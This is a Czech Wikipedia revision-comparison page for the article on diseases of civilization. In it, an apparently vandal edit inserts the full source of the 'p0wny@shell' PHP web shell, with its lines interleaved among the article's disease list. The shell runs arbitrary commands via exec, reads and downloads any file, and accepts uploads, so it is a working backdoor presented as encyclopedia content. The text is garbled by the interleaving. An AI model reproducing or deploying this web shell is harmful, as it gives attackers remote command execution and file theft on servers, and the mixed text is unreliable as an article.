Civilizační choroba: Porovnání verzí

Skočit na navigaci Skočit na vyhledávání
Přidáno 15 273 bajtů ,  před 2 lety
bez shrnutí editace
m (Editace uživatele 37.221.241.87 (diskuse) vráceny do předchozího stavu, jehož autorem je 84.242.121.100 (17885591): revert vandalismu)
značky: rychlé vrácení zpět SWViewer [1.3]
Bez shrnutí editace
značky: editace z mobilu editace z mobilního webu
* příliš mnoho živočišných tuků
 
<?php
== Choroby často označované jako civilizační ==
 
* [[ateroskleróza]]
function featureShell($cmd, $cwd) {
* [[infarkt myokardu]]
$stdout = array();
* [[cévní mozková příhoda]]
 
* [[hypertenze]]
if (preg_match("/^\s*cd\s*$/", $cmd)) {
* [[obezita]]
// pass
* [[diabetes mellitus]]
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
* [[rakovina]]
chdir($cwd);
* [[revmatické nemoci]]
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
* předčasné [[porod]]y a [[potrat]]y
chdir($match[1]);
* některé vrozené vývojové vady nervového systému novorozenců
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
* [[Alzheimerova choroba]]
chdir($cwd);
* [[chronický únavový syndrom]]
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
* [[zácpa]]
return featureDownload($match[1]);
* [[syndrom vyhoření]]
} else {
* [[deprese (psychologie)|deprese]]
chdir($cwd);
exec($cmd, $stdout);
}
 
return array(
"stdout" => $stdout,
"cwd" => getcwd()
);
}
 
function featurePwd() {
return array("cwd" => getcwd());
}
 
function featureHint($fileName, $cwd, $type) {
chdir($cwd);
if ($type == 'cmd') {
$cmd = "compgen -c $fileName";
} else {
$cmd = "compgen -f $fileName";
}
$cmd = "/bin/bash -c \"$cmd\"";
$files = explode("\n", shell_exec($cmd));
return array(
'files' => $files,
);
}
 
function featureDownload($filePath) {
$file = @file_get_contents($filePath);
if ($file === FALSE) {
return array(
'stdout' => array('File not found / no read permission.'),
'cwd' => getcwd()
);
} else {
return array(
'name' => basename($filePath),
'file' => base64_encode($file)
);
}
}
 
function featureUpload($path, $file, $cwd) {
chdir($cwd);
$f = @fopen($path, 'wb');
if ($f === FALSE) {
return array(
'stdout' => array('Invalid path / no write permission.'),
'cwd' => getcwd()
);
} else {
fwrite($f, base64_decode($file));
fclose($f);
return array(
'stdout' => array('Done.'),
'cwd' => getcwd()
);
}
}
 
if (isset($_GET["feature"])) {
 
$response = NULL;
 
switch ($_GET["feature"]) {
case "shell":
$cmd = $_POST['cmd'];
if (!preg_match('/2>/', $cmd)) {
$cmd .= ' 2>&1';
}
$response = featureShell($cmd, $_POST["cwd"]);
break;
case "pwd":
$response = featurePwd();
break;
case "hint":
$response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);
break;
case 'upload':
$response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);
}
 
header("Content-Type: application/json");
echo json_encode($response);
die();
}
 
?><!DOCTYPE html>
 
<html>
 
<head>
<meta charset="UTF-8" />
<title>p0wny@shell:~#</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<style>
html, body {
margin: 0;
padding: 0;
background: #333;
color: #eee;
font-family: monospace;
}
 
#shell {
background: #222;
max-width: 800px;
margin: 50px auto 0 auto;
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
font-size: 10pt;
display: flex;
flex-direction: column;
align-items: stretch;
}
 
#shell-content {
height: 500px;
overflow: auto;
padding: 5px;
white-space: pre-wrap;
flex-grow: 1;
}
 
#shell-logo {
font-weight: bold;
color: #FF4180;
text-align: center;
}
 
@media (max-width: 991px) {
#shell-logo {
display: none;
}
 
html, body, #shell {
height: 100%;
width: 100%;
max-width: none;
}
 
#shell {
margin-top: 0;
}
}
 
@media (max-width: 767px) {
#shell-input {
flex-direction: column;
}
}
 
.shell-prompt {
font-weight: bold;
color: #75DF0B;
}
 
.shell-prompt > span {
color: #1BC9E7;
}
 
#shell-input {
display: flex;
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
border-top: rgba(255, 255, 255, .05) solid 1px;
}
 
#shell-input > label {
flex-grow: 0;
display: block;
padding: 0 5px;
height: 30px;
line-height: 30px;
}
 
#shell-input #shell-cmd {
height: 30px;
line-height: 30px;
border: none;
background: transparent;
color: #eee;
font-family: monospace;
font-size: 10pt;
width: 100%;
align-self: center;
}
 
#shell-input div {
flex-grow: 1;
align-items: stretch;
}
 
#shell-input input {
outline: none;
}
</style>
 
<script>
var CWD = null;
var commandHistory = [];
var historyPosition = 0;
var eShellCmdInput = null;
var eShellContent = null;
 
function _insertCommand(command) {
eShellContent.innerHTML += "\n\n";
eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> ';
eShellContent.innerHTML += escapeHtml(command);
eShellContent.innerHTML += "\n";
eShellContent.scrollTop = eShellContent.scrollHeight;
}
 
function _insertStdout(stdout) {
eShellContent.innerHTML += escapeHtml(stdout);
eShellContent.scrollTop = eShellContent.scrollHeight;
}
 
function featureShell(command) {
 
_insertCommand(command);
if (/^\s*upload\s+[^\s]+\s*$/.test(command)) {
featureUpload(command.match(/^\s*upload\s+([^\s]+)\s*$/)[1]);
} else if (/^\s*clear\s*$/.test(command)) {
// Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer
eShellContent.innerHTML = '';
} else {
makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
if (response.hasOwnProperty('file')) {
featureDownload(response.name, response.file)
} else {
_insertStdout(response.stdout.join("\n"));
updateCwd(response.cwd);
}
});
}
}
 
function featureHint() {
if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete
 
function _requestCallback(data) {
if (data.files.length <= 1) return; // no completion
 
if (data.files.length === 2) {
if (type === 'cmd') {
eShellCmdInput.value = data.files[0];
} else {
var currentValue = eShellCmdInput.value;
eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]);
}
} else {
_insertCommand(eShellCmdInput.value);
_insertStdout(data.files.join("\n"));
}
}
 
var currentCmd = eShellCmdInput.value.split(" ");
var type = (currentCmd.length === 1) ? "cmd" : "file";
var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1];
 
makeRequest(
"?feature=hint",
{
filename: fileName,
cwd: CWD,
type: type
},
_requestCallback
);
 
}
 
function featureDownload(name, file) {
var element = document.createElement('a');
element.setAttribute('href', 'data:application/octet-stream;base64,' + file);
element.setAttribute('download', name);
element.style.display = 'none';
document.body.appendChild(element);
element.click();
document.body.removeChild(element);
_insertStdout('Done.');
}
 
function featureUpload(path) {
var element = document.createElement('input');
element.setAttribute('type', 'file');
element.style.display = 'none';
document.body.appendChild(element);
element.addEventListener('change', function () {
var promise = getBase64(element.files[0]);
promise.then(function (file) {
makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
_insertStdout(response.stdout.join("\n"));
updateCwd(response.cwd);
});
}, function () {
_insertStdout('An unknown client-side error occurred.');
});
});
element.click();
document.body.removeChild(element);
}
 
function getBase64(file, onLoadCallback) {
return new Promise(function(resolve, reject) {
var reader = new FileReader();
reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };
reader.onerror = reject;
reader.readAsDataURL(file);
});
}
 
function genPrompt(cwd) {
cwd = cwd || "~";
var shortCwd = cwd;
if (cwd.split("/").length > 3) {
var splittedCwd = cwd.split("/");
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
}
return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
}
 
function updateCwd(cwd) {
if (cwd) {
CWD = cwd;
_updatePrompt();
return;
}
makeRequest("?feature=pwd", {}, function(response) {
CWD = response.cwd;
_updatePrompt();
});
 
}
 
function escapeHtml(string) {
return string
.replace(/&/g, "&amp;")
.replace(/</g, "&lt;")
.replace(/>/g, "&gt;");
}
 
function _updatePrompt() {
var eShellPrompt = document.getElementById("shell-prompt");
eShellPrompt.innerHTML = genPrompt(CWD);
}
 
function _onShellCmdKeyDown(event) {
switch (event.key) {
case "Enter":
featureShell(eShellCmdInput.value);
insertToHistory(eShellCmdInput.value);
eShellCmdInput.value = "";
break;
case "ArrowUp":
if (historyPosition > 0) {
historyPosition--;
eShellCmdInput.blur();
eShellCmdInput.focus();
eShellCmdInput.value = commandHistory[historyPosition];
}
break;
case "ArrowDown":
if (historyPosition >= commandHistory.length) {
break;
}
historyPosition++;
if (historyPosition === commandHistory.length) {
eShellCmdInput.value = "";
} else {
eShellCmdInput.blur();
eShellCmdInput.focus();
eShellCmdInput.value = commandHistory[historyPosition];
}
break;
case 'Tab':
event.preventDefault();
featureHint();
break;
}
}
 
function insertToHistory(cmd) {
commandHistory.push(cmd);
historyPosition = commandHistory.length;
}
 
function makeRequest(url, params, callback) {
function getQueryString() {
var a = [];
for (var key in params) {
if (params.hasOwnProperty(key)) {
a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key]));
}
}
return a.join("&");
}
var xhr = new XMLHttpRequest();
xhr.open("POST", url, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState === 4 && xhr.status === 200) {
try {
var responseJson = JSON.parse(xhr.responseText);
callback(responseJson);
} catch (error) {
alert("Error while parsing response: " + error);
}
}
};
xhr.send(getQueryString());
}
 
window.onload = function() {
eShellCmdInput = document.getElementById("shell-cmd");
eShellContent = document.getElementById("shell-content");
updateCwd();
eShellCmdInput.focus();
};
</script>
</head>
 
<body>
<div id="shell">
<pre id="shell-content">
<div id="shell-logo">
___ ____ _ _ _ _ _ <span></span>
_ __ / _ \__ ___ __ _ _ / __ \ ___| |__ ___| | |_ /\/|| || |_ <span></span>
| '_ \| | | \ \ /\ / / '_ \| | | |/ / _` / __| '_ \ / _ \ | (_)/\/_ .. _|<span></span>
| |_) | |_| |\ V V /| | | | |_| | | (_| \__ \ | | | __/ | |_ |_ _|<span></span>
| .__/ \___/ \_/\_/ |_| |_|\__, |\ \__,_|___/_| |_|\___|_|_(_) |_||_| <span></span>
|_| |___/ \____/ <span></span>
</div>
</pre>
<div id="shell-input">
<label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label>
<div>
<input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/>
</div>
</div>
</div>
</body>
 
</html>
 
== Externí odkazy ==
Neregistrovaný uživatel

Navigační menu